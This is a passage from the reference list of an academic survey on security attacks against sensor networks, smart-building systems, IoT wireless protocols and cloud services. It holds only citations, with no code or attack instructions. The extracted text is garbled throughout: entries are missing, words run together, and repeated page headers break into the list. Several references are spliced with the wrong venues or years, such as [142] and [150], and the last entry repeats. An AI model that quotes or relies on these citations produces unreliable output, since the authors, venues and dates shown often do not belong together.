[88] Lorenz Schwittmann, Christopher Boelmann, Viktor Matkovic, Matthäus Wander, and Torben Weis. Identifying TV channels & on-demand videos using ambient light sensors. Pervasive and Mobile Computing, 38:363–380, 2017.
[89] Lorenz Schwittmann, Viktor Matkovic, Torben Weis, et al. Video recognition using ambient light sensors. In , pages 1–9. IEEE, 2016.
[90] Anindya Maiti and Murtuza Jadliwala. Light Ears: Information leakage via smart lights. Proceedings of the ACM on Interactive, Mobile, Wearable and Ubiquitous Technologies, 3(3):1–27, 2019.
[91] Zheng Zhou, Weiming Zhang, and Nenghai Yu. IREXF: Data exfiltration from air-gapped networks by infrared remote control signals. arXiv preprint arXiv:1801.03218, 2018.
[92] Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. An optical covert-channel to leak data through an air-gap. In , pages 642–649. IEEE, 2016.
[93] Mordechai Guri and Dima Bykhovsky. aIR-Jumper: Covert air-gap exfiltration/infiltration via security cameras & infrared (IR). Computers & Security, 82:15–29, 2019.
[94] Mordechai Guri and Yuval Elovici. Bridgeware: The air-gap malware. 2018.
[95] Joe Loughry and David A. Umphress. Information leakage from optical emanations. ACM Transactions on Information and System Security (TISSEC), 5(3):262–289, 2002.
[96] Eyal Ronen and Adi Shamir. Extended functionality attacks on IoT
devices: The case of smart lights. In , pages 3–12. IEEE, 2016.
[97] Amit Kumar Sikder, Hidayet Aksu, and A. Selcuk Uluagac. Context-aware intrusion detection method for smart devices with sensors, September 17, 2019. US Patent 10,417,413.
[98] Amit Kumar Sikder, Hidayet Aksu, and A. Selcuk Uluagac. 6thSense: A context-aware sensor-based attack detector for smart devices. In USENIX Security Symposium (USENIX Security 17), pages 397–414, 2017.
[99] V. Shakhov, I. Koo, and A. Rodionov. Energy exhaustion attacks in wireless networks. In , pages 1–3, 2017.
[100] Michael Bauer, Mark Coatsworth, and Justin Moeller. NANSA: A no-attribution NoSleep battery exhaustion attack for portable computing devices. http://pages.cs.wisc.edu/~bauer/CS736Final.pdf, 2015. Online: Accessed 11-Feb-2021.
[101] B. R. Moyers, J. P. Dunning, R. C. Marchany, and J. G. Tront. Effects of Wi-Fi and Bluetooth battery exhaustion attacks on mobile devices. In , pages 1–9, 2010.
[102] T. Martin, M. Hsiao, Dong Ha, and J. Krishnaswami. Denial-of-service attacks on battery-powered mobile computers. In Second IEEE Annual Conference on Pervasive Computing and Communications, 2004. Proceedings of the, pages 309–318, 2004.
[103] Timothy K. Buennemeyer, Michael Gora, Randy C. Marchany, and Joseph G. Tront. Battery exhaustion attack detection with small handheld mobile computers. In , pages 1–5. IEEE, 2007.
[104] Daniel Charles Nash. An Intrusion Detection System for Battery Exhaustion Attacks on Mobile Computers. PhD thesis, Virginia Tech, 2005.
[105] R. Upadhyay, S. Khan, H. Tripathi, and U. R. Bhatt. Detection and prevention of DDoS attack in WSN for AODV and DSR using battery drain. In , pages 446–451, 2015.
[106] Stefan Hristozov, Manuel Huber, and Georg Sigl. Protecting RESTful IoT devices from battery exhaustion DoS attacks. arXiv preprint arXiv:1911.08134
The Journal of Supercomputing, 71(8):3181–3212, 2015.
[112] Abe Davis, Michael Rubinstein, Neal Wadhwa, Gautham J. Mysore, Frédo Durand, and William T. Freeman. The visual microphone: Passive recovery of sound from video. ACM Trans. Graph., 33(4), July 2014.
[113] Kai Xing, Shyaam Sundhar Rajamadam Srinivasan, Major Jose, Jiang Li, Xiuzhen Cheng, et al. Attacks and countermeasures in sensor networks: A survey. In Network Security, pages 251–272. Springer, 2010.
[114] P. Sinha, V. K. Jha, A. K. Rai, and B. Bhushan. Security vulnerabilities, attacks and countermeasures in wireless sensor networks at various layers of OSI reference model: A survey. In , pages 288–293, 2017.
[115] Furrakh Shahzad, Maruf Pasha, and Arslan Ahmad. A survey of active attacks on wireless sensor networks and their countermeasures. arXiv preprint arXiv:1702.07136, 2017.
[116] G. Padmavathi, Shanmugapriya, et al. A survey of attacks, security mechanisms and challenges in wireless sensor networks. arXiv preprint arXiv:0909.0576, 2009.
[117] David Martins and Hervé Guyennet. Wireless sensor network attacks and security mechanisms: A short survey. In , pages 313–320. IEEE, 2010.
[118] Shio Kumar Singh, M. P. Singh, and Dharmendra K. Singh. A survey on network security and attack defense mechanism for wireless sensor networks. International Journal of Computer Trends and Technology, 1(2):9–17, 2011.
[119] Leela Krishna Bysani and Ashok Kumar Turuk. A survey on selective forwarding attack in wireless sensor networks. In , pages 1–5. IEEE, 2011.
[120] Majid Meghdadi, Suat Ozdemir, and Inan Güler. A survey of wormhole-based attacks and their countermeasures in wireless sensor networks. IETE Technical Review, 28(2):89–102, 2011.
[121] K. Venkatraman, J. Vijay Daniel, and G. Murugaboopathi. Various attacks in wireless sensor network: Survey. International Journal of Soft Computing and Engineering (IJSCE), 3(1):208–212, 2013.
[122] Anthony D. Wood and John A. Stankovic. A taxonomy for denial-of-service attacks in wireless sensor networks. Handbook of Sensor Networks: Compact Wireless and Wired Sensing Systems, pages 739–763, 2004.
[123] David R. Raymond and Scott F. Midkiff. Denial-of-service in wireless sensor networks: Attacks and defenses. IEEE Pervasive Computing, 7(1):74–81, 2008.
[124] Kevin Fu and Wenyuan Xu. Risks of trusting the physics of sensors. https://cacm.acm.org/opinion/articles/224627-risks-of-trusting-the-physics-of-sensors/fulltext, 2018. Online: Accessed 20-June-2019.
[125] Guoming Zhang, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, and Wenyuan Xu. DolphinAttack: Inaudible voice commands. In Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security, pages 103–117, 2017.
[126] A. Selcuk Uluagac, Venkatachalam Subramanian, and Raheem Beyah. Sensory channel threats to cyber physical systems: A wake-up call. In , pages 301–309. IEEE, 2014.
[127] Raphael Spreitzer. PIN skimming: Exploiting the ambient-light sensor in mobile devices. In Proceedings of the 4th ACM Workshop on Security and Privacy in Smartphones & Mobile Devices, pages 51–62, 2014.
[128] Liang Cai and Hao Chen. On the practicality of motion based keystroke inference attack. In International Conference on Trust and Trustworthy Computing, pages 273–290. Springer, 2012.
[129] Ahmed Al-Haiqi, Mahamod Ismail, and Rosdiadee Nordin. Keystrokes inference attack on Android: A comparative evaluation of sensors and their fusion. Journal of ICT Research and Applications, 7(2):117–136, 2013.
[130] Yan Huang, Xin Guan, Hongyang Chen, Yi Liang, Shanshan Yuan, and Tomoaki Ohtsuki. Risk assessment of private information inference for motion sensor embedded IoT devices. IEEE Transactions on Emerging Topics in Computational Intelligence, 2019.
[131] Emmanuel Owusu, Jun Han, Sauvik Das, Adrian Perrig, and Joy Zhang. ACCessory: Password inference using accelerometers on smartphones. In Proceedings of the Twelfth Workshop on Mobile Computing Systems & Applications, pages 1–6, 2012.
[132] Philip Marquardt, Arunabh Verma, Henry Carter, and Patrick Traynor. (sp)iPhone: Decoding vibrations from nearby keyboards using mobile phone accelerometers. In Proceedings of the 18th ACM Conference on Computer and Communications Security, pages 551–562, 2011.
[133] Sashank Narain, Amirali Sanatinia, and Guevara Noubir. Single-stroke language-agnostic keylogging using stereo-microphones and domain specific machine learning. In Proceedings of the 2014 ACM Conference on Security and Privacy in Wireless & Mobile Networks, pages 201–212, 2014.
[134] Jessy Lin and Jason Seibel. Motion-based side-channel attack on mobile keystrokes. http://css.csail.mit.edu/6.858/2019/projects/lnj-jseibel.pdf, 2019.
[135] Zhi Xu, Kun Bai, and Sencun Zhu. TapLogger: Inferring user inputs on smartphone touchscreens using on-board motion sensors. In Proceedings of the Fifth ACM Conference on Security and Privacy in Wireless and Mobile Networks, pages 113–124, 2012.
[136] Emiliano Miluzzo, Alexander Varshavsky, Suhrid Balakrishnan, and Romit Roy Choudhury. TapPrints: Your finger taps have fingerprints. In Proceedings of the 10th International Conference on Mobile Systems, Applications, and Services, pages 323–336, 2012.
[137] Trang Nguyen. Using unrestricted mobile sensors to infer tapped and traced user inputs. In , pages 151–156. IEEE, 2015.
[138] Duncan Hodges and Oliver Buckley. Reconstructing what you said: Text inference using smartphone motion. IEEE Transactions on Mobile Computing, 18(4):947–959, 2018.
[139] Yi Liang, Zhipeng Cai, Jiguo Yu, Qilong Han, and Yingshu Li. Deep learning based inference of private information using embedded sensors in smart devices. IEEE Network, 32(4):8–14, 2018.
[140] Nirupam Roy and Romit Roy Choudhury. Listening through a vibration motor. In Proceedings of the 14th Annual International Conference on Mobile Systems, Applications, and Services, MobiSys '16, pages 57–69, New York, NY, USA, 2016. Association for Computing Machinery.
[141] Martin Vuagnoux and Sylvain Pasini. Compromising electromagnetic emanations of wired and wireless keyboards. In USENIX Security Symposium, pages 1–16, 2009.
[142] Jun Han, Albert Jin Chung, and Patrick Tague. PitchIn: Eavesdropping via intelligible speech reconstruction using non-acoustic sensor fusion. In Proceedings of the 16th ACM/IEEE International Conference on Information Processing in Sensor Networks, pages 296–310.
IEEE, 2007.
[147] Miron Abramovici and Paul Bradley. Integrated circuit security: New threats and solutions. In Proceedings of the 5th Annual Workshop on Cyber Security and Information Intelligence Research: Cyber Security and Information Intelligence Challenges and Strategies, pages 1–3, 2009.
[148] Rajat Subhra Chakraborty and Swarup Bhunia. Hardware protection and authentication through netlist level obfuscation. In , pages 674–677. IEEE, 2008.
[149] Rajat Subhra Chakraborty and Swarup Bhunia. HARPOON: An obfuscation-based SoC design methodology for hardware protection. IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems, 28(10):1493–1502, 2009.
[150] Rajat Subhra Chakraborty and Swarup Bhunia. Security through obscurity: An approach for protecting register transfer level hardware IP. In
Proceedings of the 31st Annual Computer Security ApplicationsConference , pages 181–190, 2015.[153] Andreas A Strikos. A full approach for intrusion detection inwireless sensor networks.
School of Information and CommunicationTechnology , 2007.[154] Krontiris Ioannis, Tassos Dimitriou, and Felix C Freiling. Towardsintrusion detection in wireless sensor networks. In
Proc. of the 13thEuropean Wireless Conference , pages 1–10. Citeseer, 2007.[155] Ashfaq Hussain Farooqi, Farrukh Aslam Khan, Jin Wang, and Sungy-oung Lee. A novel intrusion detection framework for wireless sensornetworks.
Personal and ubiquitous computing , 17(5):907–919, 2013.[156] Kanthakumar Pongaliur, Zubin Abraham, Alex X Liu, Li Xiao, andLeo Kempel. Securing sensor nodes against side channel attacks. In ,pages 353–361. IEEE, 2008.[157] Zhenwei Yu and Jeffrey JP Tsai. A framework of machine learningbased intrusion detection for wireless sensor networks. In , pages 272–279. IEEE, 2008.[158] Stephen Genusa. Crestron cresnet monitor. https://pushstack.wordpress.com/somfy-rts-protocol/, 2015. Online: Accessed 18-May-2020.[159] Caleb Mays, Mason Rice, Benjamin Ramsey, John Pecarina, andBarry Mullins. Defending building automation systems using decoynetworks. In
International Conference on Critical InfrastructureProtection , pages 297–317. Springer, 2017.[160] A. Volkova, M. Niedermeier, R. Basmadjian, and H. de Meer. Securitychallenges in control network protocols: A survey.
IEEE Communi-cations Surveys Tutorials , 21(1):619–639, 2019.[161] David G. Holmberg. Bacnet wide area network security threatassessment.
NIST, Department of Commerce , July 2003.[162] O. Gasser, Q. Scheitle, C. Denis, N. Schricker, and G. Carle. Securityimplications of publicly reachable building automation systems. In
Proceedings of the 7thannual international conference on Mobile computing and networking ,pages 180–189, 2001.[165] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and BehrangSamadi. A survey on wireless security protocols (wep, wpa andwpa2/802.11 i). In
International Conference on Security in Computer Networks andDistributed Systems , pages 496–511. Springer, 2014.
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac [169] Mathy Vanhoef and Frank Piessens. Key reinstallation attacks: Forcingnonce reuse in wpa2. In
Proceedings of the 2017 ACM SIGSACConference on Computer and Communications Security , pages 1313–1328, 2017.[170] Kody. Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust AttackUsing Airgeddon. https://null-byte.wonderhowto.com/how-to/hack-wpa-wpa2-wi-fi-passwords-with-pixie-dust-attack-using-airgeddon-0183556/, 2018. Online: Accessed 10-November-2020.[171] Mathy Vanhoef and Eyal Ronen. Dragonblood: Analyzing the drag-onfly handshake of wpa3 and eap-pwd. In
Proceedings of the 2020IEEE Symposium on Security and Privacy-S&P 2020) . IEEE, 2020.[172] Christopher P Kohlios and Thaier Hayajneh. A comprehensive attackflow model and security analysis for wi-fi and wpa3.
Electronics ,7(11):284, 2018.[173] Karim Lounis and Mohammad Zulkernine. Bad-token: denial ofservice attacks on wpa3. In
Proceedings of the 12th InternationalConference on Security of Information and Networks , pages 1–8, 2019.[174] Karim Lounis and Mohammad Zulkernine. Wpa3 connection depri-vation attacks. In
International Conference on Risks and Security ofInternet and Systems , pages 164–176. Springer, 2019.[175] Ying Wang, Zhigang Jin, and Ximan Zhao. Practical defense againstwep and wpa-psk attack for wlan. In , pages 1–4. IEEE, 2010.[176] Karim Lounis and Mohammad Zulkernine. Attacks and defenses inshort-range wireless technologies for iot.
IEEE Access , 8:88892–88932, 2020.[177] Lindsey N Whitehurst, Todd R Andel, and J Todd McDonald. Ex-ploring security in zigbee networks. In
Proceedings of the 9th AnnualCyber and Information Security Research Conference , pages 25–28,2014.[178] Chafika Benzaid, Karim Lounis, Ameer Al-Nemrat, Nadjib Badache,and Mamoun Alazab. Fast authentication in wireless sensor networks.
Future Generation Computer Systems , 55:362–375, 2016.[179] M. Knight. Wireless security - how safe is z-wave?
Computing ControlEngineering Journal , 17(6):18–23, Dec 2006.[180] R. Krejˇcí, O. Hujˇnák, and M. Švepeš. Security survey of the iot wire-less protocols. In ,pages 1–4, Nov 2017.[181] Jianfeng Wang. Zigbee light link and its applicationss.
IEEE WirelessCommunications , 20(4):6–7, 2013.[182] Tobias Zillner and Sebastian Strobl. Zigbee exploited: The good,the bad and the ugly. , 2015.[183] X. Cao, D. M. Shila, Y. Cheng, Z. Yang, Y. Zhou, and J. Chen. Ghost-in-zigbee: Energy depletion attack on zigbee-based wireless networks.
IEEE Internet of Things Journal , 3(5):816–829, Oct 2016.[184] E. Ronen, A. Shamir, A. O. Weingarten, and C. O’Flynn. Iot goesnuclear: Creating a zigbee chain reaction.
IEEE Security Privacy ,16(1):54–62, January 2018.[185] O. Olawumi, K. Haataja, M. Asikainen, N. Vidgren, and P. Toivanen.Three practical attacks against zigbee security: Attack scenario defi-nitions, practical experiments, countermeasures, and lessons learned.In ,pages 199–206, Dec 2014.[186] RiverLoopSec. Framework and Tools for Attacking ZigBee and IEEE802.15.4 networks. https://github.com/riverloopsec/killerbee, 2017.[187] Behrang Fouladi and Sahand Ghanoun. Security evaluation of thez-wave wireless protocol.
Black Hat USA , 24:1–2, 2013.[188] J. D. Fuller and B. W. Ramsey. Rogue z-wave controllers: A per-sistent attack channel. In , pages 99–106. IEEE, 2019.[191] Yaniv Shaked and Avishai Wool. Cracking the bluetooth pin. In
Proceedings of the 3rd international conference on Mobile systems,applications, and services , pages 39–50, 2005.[192] Seyed Mahdi Darroudi and Carles Gomez. Bluetooth low energy meshnetworks: A survey.
Sensors , 17(7):1467, 2017.[193] Nateq Be-Nazir Ibn Minar and Mohammed Tarique. Bluetooth securitythreats and solutions: a survey.
International Journal of Distributedand Parallel Systems , 3(1):127, 2012.[194] John Dunning. Taming the blue beast: A survey of bluetooth basedthreats.
IEEE Security & Privacy , 8(2):20–27, 2010.[195] Konstantin Hypponen and Keijo MJ Haataja. “nino” man-in-the-middle attack on bluetooth secure simple pairing. In , pages1–5. IEEE, 2007.[196] Da-Zhi Sun, Yi Mu, and Willy Susilo. Man-in-the-middle attacks onsecure simple pairing in bluetooth standard v5. 0 and its countermea-sure.
Personal and Ubiquitous Computing , 22(1):55–67, 2018.[197] Keijo Haataja and Pekka Toivanen. Two practical man-in-the-middleattacks on bluetooth secure simple pairing and countermeasures.
IEEETransactions on Wireless Communications , 9(1):384–392, 2010.[198] Keijo Haataja and Pekka Toivanen. Practical man-in-the-middle attacksagainst bluetooth secure simple pairing. In , pages 1–5. IEEE, 2008.[199] Keijo MJ Haataja and Konstantin Hypponen. Man-in-the-middleattacks on bluetooth: a comparative analysis, a novel attack, andcountermeasures. In , pages 1096–1102. IEEE,2008.[200] Johannes Barnickel, Jian Wang, and Ulrike Meyer. Implementing anattack on bluetooth 2.1+ secure simple pairing in passkey entry mode.In
WOOT , 7:1–10, 2007.[203] Karim Lounis and Mohammad Zulkernine. Connection dumpingvulnerability affecting bluetooth availability. In
International Confer-ence on Risks and Security of Internet and Systems , pages 188–204.Springer, 2018.[204] Asma Alsaidi and Firdous Kausar. Security attacks and countermea-sures on cloud assisted iot applications. In
Wireless VITAE 2013 , pages 1–5, 2013.[208] S. M. MirhoseiniNejad, A. Rahmanpour, and S. M. Razavizadeh.Phase jamming attack: A practical attack on physical layer-basedkey derivation. In , pages 1–4, 2018.
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac [209] A. Mpitziopoulos, D. Gavalas, C. Konstantopoulos, and G. Pantziou.A survey on jamming attacks and countermeasures in wsns.
IEEECommunications Surveys Tutorials , 11(4):42–56, 2009.[210] Kanika Grover, Alvin Lim, and Qing Yang. Jamming and anti–jamming techniques in wireless networks: a survey.
InternationalJournal of Ad Hoc and Ubiquitous Computing , 17(4):197–215, 2014.[211] Matthias Wilhelm, Ivan Martinovic, Jens B. Schmitt, and VincentLenders. Short paper: Reactive jamming in wireless networks: Howrealistic is the threat? In
Proceedings of the Fourth ACM Conferenceon Wireless Network Security
IEEE INFOCOM 2007-26th IEEE International Conferenceon Computer Communications , pages 1307–1315. IEEE, 2007.[214] S. D. Babar, N. R. Prasad, and R. Prasad. Jamming attack: Behavioralmodelling and analysis. In
Wireless VITAE 2013 , pages 1–5, 2013.[215] V. C. Manju and K. M. Sasi. Detection of jamming style dos attack inwireless sensor network. In , pages 563–567, 2012.[216] Opeyemi Osanaiye, Attahiru S Alfa, and Gerhard P Hancke. Astatistical approach to detect jamming attacks in wireless sensornetworks.
Sensors , 18(6):1691, 2018.[217] Luis Puche Rondon, Leonardo Babun, Kemal Akkaya, and A. SelcukUluagac. Hdmi-walk: Attacking hdmi distribution networks via con-sumer electronic control protocol. In
IEEETransactions on Network Science and Engineering
IP Network Design Guide
Iraqi Journal for Computers and Informatics
NISTSpecial Publication
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac
IEICE transactions on communications , pages 96–103, Dec 2016.[269] Zakir Durumeric, Eric Wustrow, and J. Alex Halderman. Zmap: Fastinternet-wide scanning and its security applications. In
Proceedings ofthe 22Nd USENIX Conference on Security , SEC’13, pages 605–620,Berkeley, CA, USA, 2013. USENIX Association.[270] Remote Central. Index of Remote Control File Areas.http://files.remotecentral.com/index.html, 2020. Online: Accessed25-September-2020.[271] J. Dudak, G. Gaspar, S. Sedivy, P. Fabo, L. Pepucha, and P. Tanuska.Serial communication protocol with enhanced properties–securingcommunication layer for smart sensors applications.
IEEE SensorsJournal , 19(1):378–390, 2019.[272] Paul Lawrence Wilson. ModSec: A Secure Modbus Protocol. Master’sthesis, Georgia Institute of Technology, 2018. [273] Ieee standard for secure scada communications protocol (sscp).
IEEEStd 1711.2-2019 ,pages 60–69. IEEE, 2007.[278] Anthony D Wood, John A Stankovic, and Sang Hyuk Son. Jam: Ajammed-area mapping service for sensor networks. In
RTSS 2003. 24thIEEE Real-Time Systems Symposium, 2003
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac
Linux J.
Future Internet , 11(6):127,2019.[310] Yuhong Liu, Yan Lindsay Sun, Jungwoo Ryoo, Syed Rizvi, andAthanasios V Vasilakos. A survey of security and privacy challengesin cloud computing: solutions and future directions.
Journal ofComputing Science and Engineering , 9(3):119–133, 2015.[311] Mark D Ryan. Cloud computing security: The scientific challenge, anda survey of solutions.
Journal of Systems and Software , 86(9):2263–2268, 2013.[312] Farrukh Shahzad. State-of-the-art survey on cloud computing securitychallenges, approaches and solutions.
Procedia Computer Science ,37:357–362, 2014.[313] Subashini Subashini and Veeraruna Kavitha. A survey on security issues in service delivery models of cloud computing.
Journal ofnetwork and computer applications , 34(1):1–11, 2011.[314] Bernd Grobauer, Tobias Walloschek, and Elmar Stocker. Under-standing cloud computing vulnerabilities.
IEEE Security & privacy ,9(2):50–57, 2010.[315] Chirag Modi, Dhiren Patel, Bhavesh Borisaniya, Avi Patel, and Mut-tukrishnan Rajarajan. A survey on security issues and solutions atdifferent layers of cloud computing.
The journal of supercomputing ,63(2):561–592, 2013.[316] Saurabh Singh, Young-Sik Jeong, and Jong Hyuk Park. A survey oncloud computing security: Issues, threats, and solutions.
Journal ofNetwork and Computer Applications , 75:200–222, 2016.[317] Diogo AB Fernandes, Liliana FB Soares, João V Gomes, Mário MFreire, and Pedro RM Inácio. Security issues in cloud environments:a survey.
International Journal of Information Security , 13(2):113–170, 2014.[318] Fahad Polash, Abdullah Abuhussein, and Sajjan Shiva. A surveyof cloud computing taxonomies: Rationale and overview. In
The9th International Conference for Internet Technology and SecuredTransactions (ICITST-2014) , pages 459–465. IEEE, 2014.[319] Ashish Singh and Kakali Chatterjee. Cloud security issues andchallenges: A survey.
Journal of Network and Computer Applications ,79:88–115, 2017.[320] Zhifeng Xiao and Yang Xiao. Security and privacy in cloud computing.
IEEE communications surveys & tutorials , 15(2):843–859, 2012.[321] Claudio A Ardagna, Rasool Asal, Ernesto Damiani, and Quang HieuVu. From security to assurance in the cloud: A survey.
ACMComputing Surveys (CSUR) , 48(1):1–50, 2015.[322] Keiko Hashizume, David G Rosado, Eduardo Fernández-Medina, andEduardo B Fernandez. An analysis of security issues for cloudcomputing.
Journal of internet services and applications , 4(1):5, 2013.[323] Rakesh Kumar and Rinkaj Goyal. On cloud security requirements,threats, vulnerabilities and countermeasures: A survey.
ComputerScience Review
The Third International Conference on e-Technologies and Networks for Development (ICeND2014) , pages 79–82, 2014.[326] M. Babiker, O. O. Khalifa, K. K. Htike, A. Hassan, and M. Za-haradeen. Automated daily human activity recognition for videosurveillance using neural network. In
ACM Computing Surveys (CSUR) , 51(4):1–35, 2018.[330] Oxford Analytica. Fallout of solarwinds hack could last for years.
Emerald Expert Briefings , (oxan-es).[331] Threat Intelligence Team. SolarWinds advanced cyberattack: Whathappened and what to do now. https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/, 2020. Online: Accessed10-January-2021.[332] Samuel Litchfield, David Formby, Jonathan Rogers, Sakis Meliopou-
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac los, and Raheem Beyah. Rethinking the honeypot for cyber-physicalsystems.
IEEE Internet Computing
Journal ofInformation Security and Applications , 38:8–27, 2018.[336] Jie Lin, Wei Yu, Nan Zhang, Xinyu Yang, Hanlin Zhang, and WeiZhao. A survey on internet of things: Architecture, enabling technolo-gies, security and privacy, and applications.
IEEE Internet of ThingsJournal , 4(5):1125–1142, 2017.[337] Fadele Ayotunde Alaba, Mazliza Othman, Ibrahim Abaker TargioHashem, and Faiz Alotaibi. Internet of things security: A survey.
Journal of Network and Computer Applications , 88:10–28, 2017.[338] Wan Haslina Hassan et al. Current research on internet of things (iot)security: A survey.
Computer networks , 148:283–294, 2019.[339] Vikas Hassija, Vinay Chamola, Vikas Saxena, Divyansh Jain, PranavGoyal, and Biplab Sikdar. A survey on iot security: application areas,security threats, and solution architectures.
IEEE Access , 7:82721–82743, 2019.[340] Alma Oracevic, Selma Dilek, and Suat Ozdemir. Security in internetof things: A survey. In , pages 1–6. IEEE, 2017.[341] Jyoti Deogirikar and Amarsinh Vidhate. Security attacks in iot: Asurvey. In , pages 32–37. IEEE, 2017.[342] Ashvini Balte, Asmita Kashid, and Balaji Patil. Security issues ininternet of things (iot): A survey.
International Journal of AdvancedResearch in Computer Science and Software Engineering , 5(4), 2015.[343] Kai Zhao and Lina Ge. A survey on the internet of things security.In , pages 663–667. IEEE, 2013.[344] Surapon Kraijak and Panwit Tuwanut. A survey on iot architectures,protocols, applications, security, privacy, real-world implementationand future trends. 2015.[345] Yuchen Yang, Longfei Wu, Guisheng Yin, Lijie Li, and Hongbin Zhao.A survey on security and privacy issues in internet-of-things.
IEEEInternet of Things Journal , 4(5):1250–1258, 2017.[346] Ankush B Pawar and Shashikant Ghumbre. A survey on iot applica-tions, security challenges and counter measures. In ,pages 294–299. IEEE, 2016.,pages 294–299. IEEE, 2016.